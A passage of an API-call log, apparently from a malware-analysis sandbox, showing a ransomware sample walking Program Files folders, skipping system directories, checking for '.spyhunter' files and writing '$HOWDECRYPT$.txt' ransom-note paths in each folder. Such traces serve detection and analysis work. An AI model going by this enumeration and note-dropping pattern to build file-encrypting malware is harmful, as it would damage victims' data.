(lpString1="Microsoft.Ink.dll", lpString2="System Volume Information") returned -1 [0087.252] lstrlenW (lpString="System Volume Information") returned 25 [0087.252] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll") returned 72 [0087.252] StrStrIW (lpFirst="Microsoft.Ink.dll", lpSrch=".spyhunter") returned 0x0 [0087.252] lstrcmpW (lpString1="Microsoft.Ink.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.252] lstrcmpW (lpString1="Microsoft.Ink.dll", lpString2="_uninstalling_.png") returned 1 [0087.252] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll") returned 72 [0087.252] GetProcessHeap () returned 0x2c0000 [0087.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x384aa0 [0087.252] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x948) returned 0x3867e8 [0087.252] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.252] lstrcmpiW (lpString1="mip.exe", lpString2="Windows") returned -1 [0087.252] lstrlenW (lpString="Windows") returned 7 [0087.252] lstrcmpiW (lpString1="mip.exe", lpString2="$Recycle.bin") returned 1 [0087.252] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.252] lstrcmpiW (lpString1="mip.exe", lpString2="System Volume Information") returned -1 [0087.252] lstrlenW (lpString="System Volume Information") returned 25 [0087.252] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe") returned 62 [0087.252] StrStrIW (lpFirst="mip.exe", lpSrch=".spyhunter") returned 0x0 [0087.252] lstrcmpW (lpString1="mip.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.252] lstrcmpW (lpString1="mip.exe", lpString2="_uninstalling_.png") returned 1 [0087.252] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe") returned 62 [0087.252] GetProcessHeap () returned 0x2c0000 [0087.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xbe) returned 0x32d5b8 [0087.252] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x950) returned 0x3867e8 [0087.253] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.253] lstrcmpiW (lpString1="mraut.dll", lpString2="Windows") returned -1 [0087.253] lstrlenW (lpString="Windows") returned 7 [0087.253] lstrcmpiW (lpString1="mraut.dll", lpString2="$Recycle.bin") returned 1 [0087.253] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.253] lstrcmpiW (lpString1="mraut.dll", lpString2="System Volume Information") returned -1 [0087.253] lstrlenW (lpString="System Volume Information") returned 25 [0087.253] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll") returned 64 [0087.253] StrStrIW (lpFirst="mraut.dll", lpSrch=".spyhunter") returned 0x0 [0087.253] lstrcmpW (lpString1="mraut.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.253] lstrcmpW (lpString1="mraut.dll", lpString2="_uninstalling_.png") returned 1 [0087.253] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll") returned 64 [0087.253] GetProcessHeap () returned 0x2c0000 [0087.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc2) returned 0x358470 [0087.253] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x958) returned 0x3867e8 [0087.253] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.253] lstrcmpiW (lpString1="mshwgst.dll", lpString2="Windows") returned -1 [0087.253] lstrlenW (lpString="Windows") returned 7 [0087.253] lstrcmpiW (lpString1="mshwgst.dll", lpString2="$Recycle.bin") returned 1 [0087.253] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.253] lstrcmpiW (lpString1="mshwgst.dll", lpString2="System Volume Information") returned -1 [0087.253] lstrlenW (lpString="System Volume Information") returned 25 [0087.253] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll") returned 66 [0087.253] StrStrIW (lpFirst="mshwgst.dll", lpSrch=".spyhunter") returned 0x0 [0087.253] lstrcmpW (lpString1="mshwgst.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.254] lstrcmpW (lpString1="mshwgst.dll", lpString2="_uninstalling_.png") returned 1 [0087.254] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll") returned 66 [0087.254] GetProcessHeap () returned 0x2c0000 [0087.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x3583a0 [0087.254] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x960) returned 0x3867e8 [0087.254] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.254] lstrcmpiW (lpString1="mshwLatin.dll", lpString2="Windows") returned -1 [0087.254] lstrlenW (lpString="Windows") returned 7 [0087.254] lstrcmpiW (lpString1="mshwLatin.dll", lpString2="$Recycle.bin") returned 1 [0087.254] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.254] lstrcmpiW (lpString1="mshwLatin.dll", lpString2="System Volume Information") returned -1 [0087.254] lstrlenW (lpString="System Volume Information") returned 25 [0087.254] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll") returned 68 [0087.254] StrStrIW (lpFirst="mshwLatin.dll", lpSrch=".spyhunter") returned 0x0 [0087.254] lstrcmpW (lpString1="mshwLatin.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.254] lstrcmpW (lpString1="mshwLatin.dll", lpString2="_uninstalling_.png") returned 1 [0087.254] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll") returned 68 [0087.254] GetProcessHeap () returned 0x2c0000 [0087.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x324638 [0087.254] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x968) returned 0x3867e8 [0087.254] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.254] lstrcmpiW (lpString1="nb-NO", lpString2="Windows") returned -1 [0087.254] lstrlenW (lpString="Windows") returned 7 [0087.254] lstrcmpiW (lpString1="nb-NO", lpString2="$Recycle.bin") returned 1 [0087.254] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.254] lstrcmpiW (lpString1="nb-NO", lpString2="System Volume Information") returned -1 [0087.255] lstrlenW (lpString="System Volume Information") returned 25 [0087.255] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO") returned 60 [0087.255] lstrcmpW (lpString1="nb-NO", lpString2=".") returned 1 [0087.255] lstrcmpW (lpString1="nb-NO", lpString2="..") returned 1 [0087.255] GetProcessHeap () returned 0x2c0000 [0087.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.255] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*") returned 62 [0087.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.255] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.255] lstrlenW (lpString="Windows") returned 7 [0087.255] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.255] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.255] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.256] lstrlenW (lpString="System Volume Information") returned 25 [0087.256] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\.") returned 62 [0087.256] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.256] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.256] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.256] lstrlenW (lpString="Windows") returned 7 [0087.256] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.256] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.256] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.256] lstrlenW (lpString="System Volume Information") returned 25 [0087.256] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\..") returned 63 [0087.256] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.256] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.256] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.256] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0087.256] lstrlenW (lpString="Windows") returned 7 [0087.256] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0087.256] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.256] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0087.256] lstrlenW (lpString="System Volume Information") returned 25 [0087.256] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui") returned 76 [0087.256] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0087.256] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.256] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0087.256] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui") returned 76 [0087.257] GetProcessHeap () returned 0x2c0000 [0087.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x372a40 [0087.257] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x970) returned 0x3867e8 [0087.257] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.257] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.257] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\$HOWDECRYPT$.txt") returned 77 [0087.257] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\$HOWDECRYPT$.txt") returned 77 [0087.257] GetProcessHeap () returned 0x2c0000 [0087.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x372b28 [0087.257] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x978) returned 0x3867e8 [0087.257] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.257] lstrcmpiW (lpString1="nl-NL", lpString2="Windows") returned -1 [0087.257] lstrlenW (lpString="Windows") returned 7 [0087.257] lstrcmpiW (lpString1="nl-NL", lpString2="$Recycle.bin") returned 1 [0087.257] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.257] lstrcmpiW (lpString1="nl-NL", lpString2="System Volume Information") returned -1 [0087.257] lstrlenW (lpString="System Volume Information") returned 25 [0087.257] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL") returned 60 [0087.257] lstrcmpW (lpString1="nl-NL", lpString2=".") returned 1 [0087.257] lstrcmpW (lpString1="nl-NL", lpString2="..") returned 1 [0087.257] GetProcessHeap () returned 0x2c0000 [0087.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.258] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*") returned 62 [0087.258] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.258] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.258] lstrlenW (lpString="Windows") returned 7 [0087.258] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.258] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.258] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.258] lstrlenW (lpString="System Volume Information") returned 25 [0087.258] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\.") returned 62 [0087.258] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.258] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.258] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.258] lstrlenW (lpString="Windows") returned 7 [0087.258] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.259] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.259] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.259] lstrlenW (lpString="System Volume Information") returned 25 [0087.259] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\..") returned 63 [0087.259] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.259] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.259] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.259] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0087.259] lstrlenW (lpString="Windows") returned 7 [0087.259] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0087.259] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.259] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0087.259] lstrlenW (lpString="System Volume Information") returned 25 [0087.259] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui") returned 76 [0087.259] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0087.259] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.259] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0087.259] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui") returned 76 [0087.259] GetProcessHeap () returned 0x2c0000 [0087.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x372c10 [0087.259] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x980) returned 0x3867e8 [0087.259] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.259] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.260] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\$HOWDECRYPT$.txt") returned 77 [0087.260] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\$HOWDECRYPT$.txt") returned 77 [0087.260] GetProcessHeap () returned 0x2c0000 [0087.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x372cf8 [0087.260] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x988) returned 0x3867e8 [0087.260] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.260] lstrcmpiW (lpString1="pl-PL", lpString2="Windows") returned -1 [0087.260] lstrlenW (lpString="Windows") returned 7 [0087.261] lstrcmpiW (lpString1="pl-PL", lpString2="$Recycle.bin") returned 1 [0087.261] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.261] lstrcmpiW (lpString1="pl-PL", lpString2="System Volume Information") returned -1 [0087.261] lstrlenW (lpString="System Volume Information") returned 25 [0087.261] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL") returned 60 [0087.261] lstrcmpW (lpString1="pl-PL", lpString2=".") returned 1 [0087.261] lstrcmpW (lpString1="pl-PL", lpString2="..") returned 1 [0087.261] GetProcessHeap () returned 0x2c0000 [0087.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.261] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*") returned 62 [0087.261] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.263] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.263] lstrlenW (lpString="Windows") returned 7 [0087.263] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.263] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.263] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.263] lstrlenW (lpString="System Volume Information") returned 25 [0087.263] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\.") returned 62 [0087.263] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.263] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.263] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.263] lstrlenW (lpString="Windows") returned 7 [0087.263] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.264] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.264] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.264] lstrlenW (lpString="System Volume Information") returned 25 [0087.264] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\..") returned 63 [0087.264] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.264] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.264] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.264] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0087.264] lstrlenW (lpString="Windows") returned 7 [0087.264] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0087.264] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.264] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0087.264] lstrlenW (lpString="System Volume Information") returned 25 [0087.264] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\tipresx.dll.mui") returned 76 [0087.264] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0087.264] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.264] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0087.264] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\tipresx.dll.mui") returned 76 [0087.264] GetProcessHeap () returned 0x2c0000 [0087.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x372de0 [0087.264] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x990) returned 0x3867e8 [0087.264] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.264] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.265] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\$HOWDECRYPT$.txt") returned 77 [0087.265] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\$HOWDECRYPT$.txt") returned 77 [0087.265] GetProcessHeap () returned 0x2c0000 [0087.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x372ec8 [0087.265] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x998) returned 0x3867e8 [0087.265] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.265] lstrcmpiW (lpString1="pt-BR", lpString2="Windows") returned -1 [0087.265] lstrlenW (lpString="Windows") returned 7 [0087.265] lstrcmpiW (lpString1="pt-BR", lpString2="$Recycle.bin") returned 1 [0087.265] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.265] lstrcmpiW (lpString1="pt-BR", lpString2="System Volume Information") returned -1 [0087.265] lstrlenW (lpString="System Volume Information") returned 25 [0087.267] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR") returned 60 [0087.267] lstrcmpW (lpString1="pt-BR", lpString2=".") returned 1 [0087.267] lstrcmpW (lpString1="pt-BR", lpString2="..") returned 1 [0087.267] GetProcessHeap () returned 0x2c0000 [0087.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.267] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*") returned 62 [0087.267] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.268] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.268] lstrlenW (lpString="Windows") returned 7 [0087.268] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.268] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.268] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.268] lstrlenW (lpString="System Volume Information") returned 25 [0087.268] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\.") returned 62 [0087.268] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.268] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.268] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.268] lstrlenW (lpString="Windows") returned 7 [0087.268] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.268] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.268] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.268] lstrlenW (lpString="System Volume Information") returned 25 [0087.269] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\..") returned 63 [0087.269] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.269] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.269] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.269] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0087.269] lstrlenW (lpString="Windows") returned 7 [0087.269] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0087.269] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.269] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0087.269] lstrlenW (lpString="System Volume Information") returned 25 [0087.269] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui") returned 76 [0087.269] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0087.269] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.269] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0087.269] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui") returned 76 [0087.269] GetProcessHeap () returned 0x2c0000 [0087.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x373180 [0087.269] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9a0) returned 0x3867e8 [0087.270] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.270] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.270] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\$HOWDECRYPT$.txt") returned 77 [0087.270] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\$HOWDECRYPT$.txt") returned 77 [0087.270] GetProcessHeap () returned 0x2c0000 [0087.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x373350 [0087.270] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9a8) returned 0x3867e8 [0087.270] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.270] lstrcmpiW (lpString1="pt-PT", lpString2="Windows") returned -1 [0087.270] lstrlenW (lpString="Windows") returned 7 [0087.270] lstrcmpiW (lpString1="pt-PT", lpString2="$Recycle.bin") returned 1 [0087.270] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.270] lstrcmpiW 